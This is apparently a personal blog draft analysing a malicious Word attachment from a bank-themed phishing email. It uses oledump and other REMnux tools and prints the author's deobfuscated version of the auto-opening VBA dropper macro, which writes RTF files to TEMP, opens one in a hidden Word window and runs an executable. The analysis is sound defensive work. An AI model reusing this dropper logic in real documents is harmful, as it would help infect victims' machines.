Secure DOC Email Malware

draft post, needs more links and images

I spent a few pleasant hours today puzzling over a malware sample I received in email this week. Attached to a message from a bank I don’t do any business with was a Word document whose contents proclaim it holds an important secret message that can only seen if macros are enabled. I was hooked .. for the malware undoubtedly within !

Along the way I found about and devoured a video workshop from Didier Stevens, who makes the tools I was using. So, allow me to plug his firm DSL and the first malicious documents workshop .

ETA 16 Nov Lots of very smart people did analysis on other samples from this campaign. I read some really good stuff about it later on a closed list, and then these are public:

  • https://www.proofpoint.com/us/dyre-malware-campaigners-innovate-distribution-techniques
  • http://phishme.com/macro-documents-with-xor-encoded-payloads/

Background

DSL’s oledump tool was very helpful in digging into the file. In fact I was fighting with the random variable names of the macro code for awhile before I thought to hash and lookup my sample. Here are those links:

Virustotal detection rate is pretty good now. I got my sample in the mail Wednesday 21 Oct. VT analysis

The public Cuckoo Sandbox instance at Malwr has some good details, including some dropped files info in their results

This MyOnlineSecurity post describes the campaign and related risks, and includes some screenshots of the doc as opened in MS Office.

surface

$ ls -lh Secure\ Message.doc 
-rw-r--r-- 1 adric adric 73K Oct 21 13:08 Secure Message.doc

$ md5sum Secure\ Message.doc 
e801337581de7c8b4e887a3f8f0944b3  Secure Message.doc

$ file Secure\ Message.doc 
Secure Message.doc: Composite Document File V2 Document, Little Endian, 
Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, 
Revision Number: 1, Name of Creating Application: Microsoft Office Word, 
Create Time/Date: Wed Oct 21 21:12:00 2015, Last Saved Time/Date: 
Wed Oct 21 17:23:00 2015, Number of Pages: 1, Number of Words: 535,
Number of Characters: 3051, Security: 0

$ gstat Secure\ Message.doc 
  File: ‘Secure Message.doc’
  Size: 74752           Blocks: 152        IO Block: 4096   regular file
Device: 1000002h/16777218d      Inode: 94755058    Links: 1
Access: (0644/-rw-r--r--)  Uid: (  502/   adric)   Gid: (   20/   staff)
Access: 2015-10-23 19:25:30.000000000 -0400
Modify: 2015-10-21 13:08:31.000000000 -0400
Change: 2015-10-21 13:08:31.000000000 -0400
 Birth: 2015-10-21 13:08:31.000000000 -0400

I did throw the sample at my local Cuckoo instance here in the home lab, but my victim virtual machine(s) don’t have winword (MS Office) so they couldn’t do anything with it.

oledump it

DSL tools are available from Didier’s [website] (http://blog.didierstevens.com/), are included in REMnux, and come with the workshop as well.

A basic run of the tool shows the sections of the Office file and call out the macros for us with an M for functional macro code:

$ /opt/remnux-didier/oledump.py Secure\ Message.doc 
  1:       121 '\x01CompObj'
  2:      4096 '\x05DocumentSummaryInformation'
  3:      4096 '\x05SummaryInformation'
  4:      9365 '1Table'
  5:      4096 'Data'
  6:       440 'Macros/PROJECT'
  7:        41 'Macros/PROJECTwm'
  8: M    4797 'Macros/VBA/ThisDocument'
  9:      2765 'Macros/VBA/_VBA_PROJECT'
 10:       515 'Macros/VBA/dir'
 11:       205 'MsoDataStore/P5\xc3\x8f\xc3\x8cV\xc3\x99\xc3\x97\xc3\x96NEGE\xc3\x8fQY\xc3\x84\xc3\x87\xc3\x83\xc3\x92P\xc3\x8eQ==/Item'
 12:       341 'MsoDataStore/P5\xc3\x8f\xc3\x8cV\xc3\x99\xc3\x97\xc3\x96NEGE\xc3\x8fQY\xc3\x84\xc3\x87\xc3\x83\xc3\x92P\xc3\x8eQ==/Properties'
 13:     37482 'WordDocument'

We can isolate, decompress and export a stream like so:

/opt/remnux-didier/oledump.py -s 8 -v  "Secure Message.doc" > macro

This macro is obfuscated a couple ways, including all of the variable and function names being noisy goo and some use of extra variables and concatenation. Here are a few lines, slightly altered as example:

Sub AutoOpen()
    YQGDJHASDB = "q,jwdlk XXXXXXXXXXX jkgasjkdhwqdasd"
    Auto_Open
End Sub

Sub Ljqhdsd()
    KAHDJKASND = "askdhjk ashdjk asghXXXXXXXXXXXX"
    Subipose
End Sub

I fussed over the code of this macro for quite awhile renaming things to make some sense of it. Here’s my version:

## main for Word 
Sub AutoOpen()
    varY = "q,jwdlk XXXXXXXXXXXXXXXX jkgasjkdhwqdasd"
    Auto_Open ##run main for Excel
End Sub

## orphan?
Sub LK()
    varK = "askdhjk ashdjk asghXXXXXXXXXXXX"
    main
End Sub

Sub main()
  slash = "\"
  Temp = "TEMP"
  On Error Resume Next
  TMP = Environ$(Temp) & slash
  FEFE = ".e"
  FEFE = FEFE & "xe"
  DEDE = "." + "rt" + "f"
  
  TCA = TMP + "322" + DEDE
  ## $TEMP\322.rtf
  TCB = TMP + "311" + DEDE
  ## $TEMP\311.rtf
  TEX = TMP + "w18" & "" + FEFE
  ## $TEMP\w18.exe
  
  ## save RTFs to disk
  SaveFile (TCA)
  SaveFile (TCB)

  ## sleep?
  Sleep (2)
  
  ## Run Word
  Set wordObj = CreateObject("Word.Application")
  wordObj.Visible = False
  Set frame = wordObj.Documents.Open(TCA)
  ## create another Word window with 322.rtf, hide it

  ## sleep and then exec  
  Sleep (2)
  Shell (TEX)
  ## run $Temp\w18.exe
  Sleep (1)

  ## stop other Word
  wordObj.Quit
  Set wordObj = Nothing
  ## kill Word

End Sub

## for Excel
Sub Workbook_Open()
    varX = "ansdh XXXXXXXXXXXXXXXX d"
    main
End Sub

## Sleep == sleep(secs)?
Sub Sleep(duration As Long)
  Dim Counter As Long
  Counter = Timer + duration
  Do While Timer < Counter
    DoEvents
  Loop
End Sub

## Save File As RTF?
Public Function SaveFile(Name As String)
    ActiveDocument.SaveAs FileName:=Name, FileFormat:=wdFormatRTF
End Function

##main for Excel
Sub Auto_Open()
    main
   varB = "qkwdhj XXXXXXXXXXXXXXXXd"
End Sub

What I think it does: when the document is opened in Word or Excel it auto executes the main function to save the document to disk into temp files using Word to convert to RTF, twice ( $TEMP\322.rtf , $TEMP\311.rtf ). Another hidden Word window is opened to one of the those files ( $TEMP\322.rtf ) and used to execute a third file ( $TEMP\w18.exe ).

Checking back with the dynamic analysis from Malwr we see the 311 and 322 files drop, along with some other possible dropped files. 311 and 322 are slightly different sizes, but 10 time larger than our specimen at 771826, 771821 bytes. A third large file in Malwr is office.odf with is ~2.3 MB . VirusTotal for that indicate that it is a signed part of MS Office: “ Microsoft Office culture data dll” so that may be an artifact of the sandbox that isn’t relevant to the malware activity.

I think Malwr’s system wasn’t vulnerable so they didn’t get the payload. My hypothesis is that something in the Office doc can exploit Word when it is written out as and then read in as RTF.

content

The Word DOC contents include a note about a encrypted message ( “A message is encrypted by RSA key.” ) and an impressive looking block of noise marked as RSA encrypted and delimited by “—–RSA PROTECTED BLOCK—–” markers.

I pulled out the data block with oledump and trimmed with vi:

/opt/remnux-didier/oledump.py -s13 --cut '0x900:0x15c0' -d Secure\ Message.doc > q; vi q

I can’t make anything out if it yet, despite trying a few basic decoding tricks. It’s pretty random, according to CHI-squared analysis with DensityScout (in REMnux):

$ densityscout -m CHI q 

DensityScout (Build 43)

by Christian Wojner

Calculating density for file ...
(Density) | Filename
--------------------------------------------------------------
(42.4244) | q

Maybe it really is encrypted, with a RSA cipher, and some of the noise in the macro is key material?

Written on October 11, 2015